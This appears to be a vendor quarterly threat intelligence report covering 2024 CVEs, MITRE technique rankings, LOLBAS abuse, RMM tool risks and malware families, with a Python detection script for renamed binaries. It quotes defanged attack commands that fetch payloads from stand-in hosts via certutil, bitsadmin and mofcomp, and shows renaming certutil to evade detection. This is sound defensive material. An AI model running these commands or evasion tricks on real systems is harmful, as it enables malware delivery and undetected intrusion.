Windows SmartScreen Bypass

CVE-2024-21412 (8.1 High)
Security Bypass

This is an Internet shortcut file security feature bypass that affects Microsoft Windows Internet shortcut files. It requires user interaction to bypass the security checks. Upon initial interaction, it causes a series of executions ultimately leading the victim to a malicious script. This zero-day vulnerability was used to deploy the DarkMe RAT by a threat group.

Windows Kernel Elevation Vulnerability

CVE-2024-21338 (7.8 High)
Elevation of Privilege

Exploiting this vulnerability allows the attacker to gain system privileges. The Lazarus Group (a North Korean threat group) exploited this zero-day vulnerability, found within the Windows AppLocker driver (appid.sys), to gain kernel-level access.

Fortra’s GoAnywhere MFT Exploit

CVE-2024-0204 (9.8 Critical)
Authentication Bypass

In January, Fortra published a security advisory disclosing a critical authentication bypass affecting its GoAnywhere MFT product. This vulnerability was found within Fortra's GoAnywhere MFT prior to 7.4.1. Exploitation allows an unauthorized user to create an admin user via the administration portal.

Jenkins Arbitrary File Read Vulnerability

CVE-2024-23897 (9.7 Critical)
Remote Code Execution

Prior versions of Jenkins — up to 2.441 and earlier, LTS 2.426.2 — contain a vulnerability found on the Jenkins controller file system via the built-in command line interface. It is found within the args4j library, which has a feature that replaces an “@” character followed by a file path in an argument with the file’s contents. This, in turn, allows an attacker to read arbitrary files on the file system, and could potentially lead to remote code execution.

ConnectWise ScreenConnect 23.9.7 Vulnerability

CVE-2024-1709 (10 Critical); CVE-2024-1708 (8.4 High)
Remote Code Execution

This vulnerability affects the ConnectWise ScreenConnect 23.9.7 product. Attackers have been seen to leverage both of these vulnerabilities in the wild. Both work in conjunction with each other where CVE-2024-1709 (a critical authentication bypass vulnerability) allows the attacker to create administrative accounts and exploit CVE-2024-1708 (a path traversal vulnerability), allowing unauthorized access to the victim’s files and directories.

Common MITRE Techniques

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following Top 20 techniques being used by threat actors in this reporting period.

An upward arrow in the last column indicates that usage of the technique has increased since our last report; a downward arrow indicates that usage has decreased, and an equals (=) symbol means that the technique remains in the same position as in our last report.

Technique Name                       | Technique ID | Tactic Name                                        | Last Report | Change
Process Injection                    | T1055        | Privilege Escalation, Defense Evasion              | 1           | =
System Information Discovery         | T1082        | Discovery                                          | 3           |
DLL Side-Loading                     | T1574.002    | Persistence, Privilege Escalation, Defense Evasion | 4           |
Input Capture                        | T1056        | Credential Access, Collection                      | 2           |
Security Software Discovery          | T1518.001    | Discovery                                          | NA          |
Masquerading                         | T1036        | Defense Evasion                                    | 10          |
File and Directory Discovery         | T1083        | Discovery                                          | 13          |
Process Discovery                    | T1057        | Discovery                                          | 19          |
Application Layer Protocol           | T1071        | Command-and-control                                | 6           |
Registry Run Keys/Startup Folder     | T1547.001    | Persistence, Privilege Escalation                  | 9           |
Non-Application Layer Protocol       | T1095        | Command-and-control                                | 5           |
Remote System Discovery              | T1018        | Discovery                                          | 15          |
Application Window Discovery         | T1010        | Discovery                                          | NA          |
Software Packing                     | T1027.002    | Defense Evasion                                    | NA          |
Scheduled Task/Job                   | T1053        | Execution, Persistence, Privilege Escalation       | 8           |
Windows Service                      | T1543.003    | Persistence, Privilege Escalation                  | 12          |
Disable or Modify Tools              | T1562.001    | Defense Evasion                                    | 18          |
Command and Scripting Interpreter    | T1059        | Execution                                          | 7           |
Obfuscated Files or Information      | T1027        | Defense Evasion                                    | NA          |
Replication Through Removable Media  | T1091        | Initial Access, Lateral Movement                   | 11          |

Using MITRE D3FEND™, the BlackBerry Threat Research and Intelligence team developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub.

The top three techniques are well-known procedures used by adversaries to gather key information to conduct successful attacks. The Applied Countermeasures section contains some examples of their usage and some useful information to monitor.

The totals for the observed techniques and tactics are shown in the graph below:

Figure 13: Observed MITRE ATT&CK® Techniques.

The most prevalent tactic this reporting period is Defense Evasion, making up 24 percent of all tactics observed during this reporting period, followed by Discovery at 23 percent, and Privilege Escalation at 21 percent.
Figure 14: Observed MITRE ATT&CK Tactics.

Applied Countermeasures for Noted MITRE Techniques

The BlackBerry Research and Intelligence Team analyzed five noted MITRE Techniques observed this reporting period:

CylanceMDR Data

This section of the report highlights several of the most common threat detections observed in CylanceMDR customer environments.

CylanceMDR, formerly known as CylanceGUARD®, is a subscription-based managed detection and response (MDR) service by BlackBerry that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats exploiting gaps in the customer’s security programs. The CylanceMDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry by region to provide additional insight into the current threat landscape.

Figure 15: Top five alerts by region.

CylanceMDR Observations

This reporting period, the CylanceMDR team observed that Certutil drove a lot of detection activity within the security operations center (SOC), namely, the technique related to renaming tools such as Certutil (e.g.: ‘Possible Certutil Renamed Execution’). There was a spike of detections related to this across all geographical regions where BlackBerry protects customers.

In our previous report, we discussed how living-off-the-land binaries and scripts (LOLBAS) utilities such as Certutil are abused or misused by threat actors: they often rename legitimate utilities (such as Certutil) in an attempt to evade detection capabilities. This is known as masquerading and has the MITRE Technique ID: T1036.003. Defenders must deploy robust detection capabilities to minimize the risk of evasion techniques such as masquerading. For example, creating a detection rule that only triggers when it sees the command Certutil (along with any options/arguments seen abused with this tool) can easily be evaded.

Take the two commands below, for example:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

If your detection capabilities only rely on seeing the command certutil (along with its options), this will be detected, but considered a weak protection as it could easily be evaded.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

In this case, we have renamed certutil.exe to outlook.exe and this would completely evade the detection (if using the logic discussed above).

A better solution would be to ensure that portable executable (PE) file/process metadata such as the original file name (the internal file name provided at compile time) is collected and integrated into the detection capabilities. A mismatch between the file name on disk and the binary’s PE metadata is a good indicator that a binary was renamed after compile time.

LOLBAS Activity

During this reporting period, we noted a change in the LOLBAS activity seen within our customer environments:

  • Increase in detections related to regsvr32.exe.
  • Decrease in mshta.exe-related activity.
  • A high increase in detections related to bitsadmin.exe.
Figure 16: LOLBAS detected by CylanceMDR.


Below are examples of malicious LOLBAS usage (excluding those that were shared during the last reporting period).

File: Bitsadmin.exe
Mitre: T1197 | T1105
How it can be abused: 

  • Download/upload from or to malicious host (Ingress tool transfer)
  • Can be used to execute malicious process

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


File: mofcomp.exe
Mitre: T1218
How it can be abused: 

  • Can be used to install malicious managed object format (MOF) scripts
  • MOF statements are parsed by mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository

Example Command:
mofcomp.exe \\<AttackerIP>\content\BBwmi[.]mof
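As an added illustration of the approach recommended in the Certutil discussion above (compare the on-disk file name with the PE OriginalFileName) and of the bitsadmin and mofcomp abuse patterns in this section, the following Python is example detection logic written for this report page; it is not BlackBerry's or CylanceMDR's own rule set. It runs over constructed Sysmon-style process-creation records (field names, OriginalFileName values and the sample command lines, which reuse the report's defanged examples, are all assumptions) and shows that the name-only rule misses the renamed certutil.exe while the metadata rule catches it.

```python
"""Detecting renamed (masqueraded) LOLBAS binaries and common LOLBAS abuse patterns.

Example code added for illustration; the event fields are modelled on Sysmon Event ID 1
(Image, OriginalFileName, CommandLine) and every sample record below is constructed.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcessEvent:
    image: str               # path of the binary as it exists on disk
    original_file_name: str  # OriginalFileName from the PE version resource ("" if absent)
    command_line: str


# Rule A: the weak, name-only rule the report warns about. It fires only when the
# command line literally starts with certutil, so renaming the binary defeats it.
NAME_ONLY_CERTUTIL = re.compile(r'^\s*"?(?:.*\\)?certutil(?:\.exe)?"?\s.*-urlcache', re.I)


def name_only_match(ev: ProcessEvent) -> bool:
    return NAME_ONLY_CERTUTIL.search(ev.command_line) is not None


def is_masqueraded(ev: ProcessEvent) -> bool:
    """Masquerading (T1036.003): the file name on disk disagrees with the name compiled
    into the PE version resource. Records without metadata cannot be judged and return False."""
    if not ev.original_file_name:
        return False
    return PureWindowsPath(ev.image).name.lower() != ev.original_file_name.lower()


def effective_name(ev: ProcessEvent) -> str:
    """Name to key the LOLBAS rules on: the PE OriginalFileName when present, else the disk name."""
    return (ev.original_file_name or PureWindowsPath(ev.image).name).lower()


# Rule C: LOLBAS command-line patterns, keyed on the effective (original) name so that
# a renamed copy still matches. Patterns follow the example commands in the report.
LOLBAS_RULES = {
    "certutil.exe": [(re.compile(r"-urlcache\b.*\s-f\b", re.I), "certutil download (T1105)")],
    "bitsadmin.exe": [(re.compile(r"/transfer\b.*\s/download\b", re.I), "bitsadmin download (T1197, T1105)")],
    # mofcomp compiling a MOF file fetched over a UNC path (\\host\share\...)
    "mofcomp.exe": [(re.compile(r"\s\\\\[^\\\s]+\\", re.I), "mofcomp compiling a MOF from a UNC path (T1218)")],
}


def detect(ev: ProcessEvent) -> list:
    """Return the list of findings for one process-creation record (empty when benign)."""
    findings = []
    if is_masqueraded(ev):
        findings.append(f"renamed binary: {PureWindowsPath(ev.image).name} is really "
                        f"{ev.original_file_name} (T1036.003)")
    for pattern, label in LOLBAS_RULES.get(effective_name(ev), []):
        if pattern.search(ev.command_line):
            findings.append(label)
    return findings


# Constructed sample telemetry (defanged URLs/paths as in the report; placeholders in <>).
EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 r'certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt'),
    # certutil.exe copied to outlook.exe: the disk name changes, the version resource does not
    ProcessEvent(r"C:\Users\Public\outlook.exe", "CertUtil.exe",
                 r'outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt'),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
                 r"bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest "
                 r"C:\Users\<user>\AppData\Local\Temp\bbtest"),
    ProcessEvent(r"C:\Windows\System32\wbem\mofcomp.exe", "mofcomp.exe",
                 r"mofcomp.exe \\<AttackerIP>\content\BBwmi[.]mof"),
    # the genuine mail client: names agree and no LOLBAS pattern applies
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE",
                 r'"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"'),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(PureWindowsPath(ev.image).name, "| name-only:", name_only_match(ev), "|", detect(ev))
```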

Remote monitoring and management (RMM) tools are frequently used by managed IT service providers (MSPs) to remotely monitor clients’ endpoints. Unfortunately, RMM tools also allow threat actors to access those same systems. These tools provide a slew of administration features and provide a way for the threat actor to blend in by using trusted and approved tools.

In 2023, RMM tool abuse was a focal point due to reports related to Scattered Spider, a cyberattack group thought to be behind the MGM Resorts International attacks in September 2023. Members of Scattered Spider are considered sophisticated social engineering experts and deploy various techniques such as SIM swap attacks, phishing and push bombing. They have used a range of RMM tools during their attacks such as:

  • Splashtop
  • TeamViewer
  • ScreenConnect

As of the first reporting period in 2024, the attention on RMM tooling has remained high since the discovery of two vulnerabilities in ConnectWise ScreenConnect (all versions below 23.9.8). CVE details can be seen below:

CVE-2024-1709

CWE-288: Authentication bypass using an alternate path or channel.

CVE-2024-1708

CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”).

The graph below illustrates the most common RMM tools observed during this reporting period.

Figure 17: RMM tools encountered by CylanceMDR.


During our analysis, we noted that many customers use multiple RMM tools, increasing the organization’s attack surface and risk. Suggested mitigations include:

Audit Remote Access Tools (RMM Tools)

  • Identify currently used RMM tools within the environment.
  • Confirm they are approved within the environment.
  • If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.

Disable Ports and Protocols

  • Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.

Routinely Audit Logs

  • Detect abnormal use of remote access tools.

Patching

  • Ensure regular review of vulnerabilities associated with RMM tools used, updating as necessary.
  • Internet accessible software such as RMM tools should always be a high priority when doing regular patch cycles. 

Network Segmentation

  • Minimize lateral movement by segmenting the network, limiting access to devices and data.

Device Tagging

  • Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure the SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.

Memory-Loading RMM

  • Use security software that can detect remote access tools that are loaded only in memory.

Conclusion

This 90-day report is designed to help you stay knowledgeable and prepared for future threats. When dealing with a rapidly shifting cybersecurity threat landscape, it’s helpful to stay current with the latest security news for your industry, geographic region and key issues. Here are our main takeaways for January through March 2024:

  • Globally, BlackBerry stopped 37,000 attacks per day directed at our tenants, according to our internal Attacks Stopped telemetry. We noted a large increase in unique malware targeting our tenants and customers, up 40 percent per minute over the previous reporting period. This could suggest that threat actors are taking extensive measures to carefully target their victims.
  • Infostealers were prominent in our Critical Infrastructure, Commercial Enterprise, and Top Threats sections. This suggests that sensitive and private data are highly sought by threat actors across all geographic regions and industries.
  • As highlighted in our new Ransomware Section that describes the most notable ransomware groups, ransomware is increasingly targeting critical infrastructure, particularly healthcare.
  • CVE exploitation has rapidly expanded in the last year and will continue. BlackBerry recorded nearly 9,000 new CVEs disclosed by NIST in the last three months. Additionally, over 56 percent of these disclosed vulnerabilities scored over 7.0 in criticality. Exploits related to heavily utilized legitimate software such as ConnectWise ScreenConnect, GoAnywhere and multiple genuine Ivanti products have been weaponized by threat actors at an alarming rate to deliver a whole host of malware to unpatched victim machines.
  • Political deceptions through deepfakes and misinformation are increasingly spreading via social media and will continue to be a problem in the future, particularly related to the Russian invasion of Ukraine, the unfolding Middle East conflict, and the upcoming U.S. presidential election taking place in November.

More information on the top cybersecurity threats and defenses can be found in the BlackBerry blog.

Appendix: Critical Infrastructure and Commercial Enterprise Threats

8Base ransomware: A particularly aggressive ransomware group first seen in 2023. It has been extremely active in its short history, often targeting victims in North America and LATAM countries. The threat group leverages a mix of tactics to achieve initial access, then may also exploit vulnerabilities in the victim’s systems to maximize their potential payout.

Amadey (Amadey Bot): Multifunctional botnet that has a modular design. Once it lands on a victim’s device, Amadey can receive commands from its C2 servers to execute various tasks, namely stealing information and deploying additional payloads.

Buhti: A relatively new ransomware operation, Buhti utilizes variants of the leaked LockBit 3.0 (a.k.a. LockBit Black) and Babuk ransomware families to attack Windows and Linux systems. In addition, Buhti has been known to use a custom data exfiltration utility written in the “Go” programming language designed to steal files with specific extensions. The ransomware operators have also already been seen swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and the recently patched PaperCut vulnerability (CVE-2023-27350).

LummaStealer (LummaC2): C-based infostealer that targets commercial enterprise and critical infrastructure organizations, focusing on exfiltrating private and sensitive data from the victim device. Often promoted and distributed via underground forums and Telegram groups, this infostealer often relies on Trojans and spam to propagate.

PrivateLoader: A notorious downloader family that has been in the wild since 2021, targeting primarily commercial enterprises in North America. PrivateLoader (as its name implies) is an initial access mechanism, facilitating the deployment of a plethora of malicious payloads onto victim devices, namely infostealers. PrivateLoader operates a distribution network via an underground pay-per-install (PPI) service to finance its continued usage and development.

RaccoonStealer: MaaS infostealer. In the wild since 2019, the makers of RaccoonStealer have enhanced its abilities to avoid security software and traditional AV software. According to BlackBerry’s internal telemetry, RaccoonStealer has been observed targeting commercial enterprises in North America.

RedLine (RedLine Stealer): A widely distributed infostealer often sold via MaaS. The main motive of the threat group that distributes the malware appears to be financial gain rather than politics, destruction or espionage. This is why RedLine has actively targeted a range of industries and geographic regions.

Remcos (RemcosRAT): A commercial-grade RAT used to remotely control a computer or device. Though advertised as legitimate software, the remote control and surveillance software was often used as a remote access Trojan.

SmokeLoader: A commonly utilized malware with a plethora of capabilities, namely the deployment of other malware onto a victim’s device. SmokeLoader has been a recurring threat observed by BlackBerry through multiple Global Threat Intelligence Reports. This reporting period, the malware was seen targeting commercial and professional services within North America.

Vidar (VidarStealer): A commodity infostealer that has been in the wild since 2018 and has developed into a heavily weaponized malware family. Attackers have been able to deploy Vidar by exploiting vulnerabilities in the popular ScreenConnect RMM software by ConnectWise. These two CVEs, CVE-2024-1708 and CVE-2024-1709, enabled threat actors to bypass authentication and access critical systems.

Legal Disclaimer

The information contained in the BlackBerry Global Threat Intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.